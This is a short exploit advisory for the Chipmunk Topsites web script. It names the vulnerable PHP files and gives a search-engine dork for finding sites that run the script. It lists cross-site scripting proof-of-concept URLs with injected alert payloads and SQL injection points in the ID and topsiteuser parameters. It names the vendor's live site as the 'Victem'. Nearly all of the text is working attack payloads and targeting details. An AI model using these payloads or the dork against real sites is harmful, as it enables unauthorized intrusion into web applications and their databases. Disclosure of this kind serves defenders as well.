######################################################### --------------------------------------------------------- Portal Name: Chipmunk Topsites Vendor : http://www.chipmunk-scripts.com/page.php?ID=10 Download : http://www.chipmunk-scripts.com/topsites/topsites.zip Vulnerable File's : addreview.php,index.php,reviews.php,authenticate.php Dork: Powered by (c) Chipmunk Topsites Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : (XSS/SQL) --------------------------------------------------------- ######################################################### [XSS]: http://www.site.com/topsites/addreview.php?ID=>'>alert(1369)%3B http://www.site.com/topsites/index.php?start=>'>alert(1369)%3B http://www.site.com/topsites/reviews.php?ID=>'>alert(1369)%3B [SQL]: http://www.site.com/topsites/addreview.php?ID=[SQL] http://www.site.com/topsites/authenticate.php?topsiteuser=[SQL] --------------------------------- Victem : http://www.chipmunk-scripts.com/topsites